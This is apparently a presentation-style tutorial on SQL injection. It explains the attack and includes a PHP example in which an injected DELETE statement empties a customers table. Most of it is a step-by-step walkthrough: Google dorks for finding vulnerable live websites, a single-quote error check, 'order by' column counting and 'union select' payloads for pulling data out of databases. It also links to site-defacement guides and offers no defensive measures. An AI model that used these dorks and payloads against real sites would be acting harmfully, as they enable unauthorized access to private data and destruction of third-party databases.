SQL Injection

By Napendra Singh

O A SQL injection attack is exactly what the name suggests – it is where a hacker tries to “inject” his harmful/malicious SQL code into someone else’s database, and force that database to run his SQL. This could potentially ruin their database tables, and even extract valuable or private information from their database tables. The idea behind SQL injection is to have the application under attack run SQL that it was never supposed to run.

What a hacker can do with SQL Injection attack?

O Bypassing LoginsO Accessing secret dataO Modifying contents of websiteO Shutting down the My SQL server

How SQL injection attack is carried out

In SQL Injection attack; attacker exploits the vulnerability created by the bad coding practice of the developer. Generally, SQL injection is largely observed with PHP and ASP applications. The SQL Injection is primarily generated from the input fields of the form of the website or web application.

Input fields in the form are meant to accept the user information required for the application. We can never trust the users, some can be legitimate (like you ) while some can have bad intentions (hackers).the hacker can execute queries from the input field of the web application. More severe queries like DELETE DATABASE can also get executed.

SQL Injection ExampleExample : - 1

MySQL & php Code :-

$name_evil = "'; DELETE FROM customers WHERE 1 or username = '";

// our MySQL query builder really should check for injection $query_evil = "SELECT * FROM customers WHERE username = '$name_evil'";

// the new evil injection query would include a DELETE statement echo "Injection: " . $query_evil;

Display:

If you were run this query, then the injected DELETE statement would completely empty

your "customers" table.

SELECT * FROM customers WHERE username = ' '; DELETE FROM customers WHERE 1 or username = ' '

How to do SQL Injection

Step 1: Finding Vulnerable Website:To find a SQL Injection vulnerable site, you can use Google search by searching for certain keywords. Those keyword often referred as 'Google dork'.

Some Examples:inurl:index.php?id=inurl:gallery.php?id=inurl:article.php?id=inurl:pageid=

Copy one of the above keyword and paste in the google. Here , we will got lot search result withWe have to visit the websites one by one for checking the vulnerability.

Step 2: Checking the Vulnerability:Now let us check the vulnerability of the target website. To check the vulnerability , add the single quotes(') at the end of the url and hit enter.

For e.g.:

If the page remains in same page or showing that page not found, then it is not vulnerable.

If you got an error message just like this, then it means that the site is vulnerable

http://www.victimsite.com/index.php?id=2'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

Step 3: Finding Number of columns:Great, we have found that the website is vulnerable to SQLi attack. Our next step is to find the number of columns present in the target database.

For that replace the single quotes(') with "order by n" statement.

Change the n from 1,2,3,4,,5,6,...n. Until you get the error like "unknown column ".

so now x=8 , The number of column is x-1 i.e, 7.

http://www.victimsite.com/index.php?id=2 order by 1(noerror)http://www.victimsite.com/index.php?id=2 order by 2(noerror)http://www.victimsite.com/index.php?id=2 order by 3(noerror)http://www.victimsite.com/index.php?id=2 order by 4(noerror)http://www.victimsite.com/index.php?id=2 order by 5(noerror)http://www.victimsite.com/index.php?id=2 order by 6(noerror)http://www.victimsite.com/index.php?id=2 order by 7(noerror)http://www.victimsite.com/index.php?id=2 order by 8(error)

In case ,if the above method fails to work for you, then try to add the "--" at the end of the statement.For eg:

http://www.victimsite.com/index.php?id=2 order by 1--

Step 4: Find the Vulnerable columns:We have successfully discovered the number of columns present in the target database. Let us find the vulnerable column by trying the query "union select columns_sequence".

Change the id value to negative(i mean id=-2). Replace the columns_sequence with the no from 1 to x-1(number of columns) separated with commas(,).

For eg:if the number of columns is 7 ,then the query is as follow:

If the above method is not working then try this:http://www.victimsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7--

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--

Once you execute the query, it will display the vulnerable column.

Bingo, column '3' and '7' are found to be vulnerable. Let us take the first vulnerable column '3' . We can inject our query in this column.

At this point, you know what columns to direct your SQL queries at and you can begin exploiting the database. You will be relying on union select statements to perform most of the functions from this point forward.The tutorial ends here. You have learned how to select a vulnerable website and detect which columns are responsive to your queries. The only thing left to do is append SQL commands to the URL. Some of the common functions you can perform at this point include getting a list of the databases available, getting the current user, getting the tables, and ultimately, the columns within these tables. The columns are where all of the personal information is stored.

Want to take deep diveAccess these URL :-http://www.explorehacking.com/2011/01/sql-injection-step-by-step-deface.html

http://www.breakthesecurity.com/2010/12/hacking-website-using-sql-injection.html

Source O https://www.udemy.com/blog/sql-injection-tutorial/

O http://www.programmerinterview.com/index.php/database-sql/sql-injection-example/

O http://www.techrecite.com/what-is-sql-injection-attack-explained-with-the-example/

O http://www.breakthesecurity.com/2010/12/hacking-website-using-sql-injection.html

O http://www.tizag.com/mysqlTutorial/mysql-php-sql-injection.php

Thanks You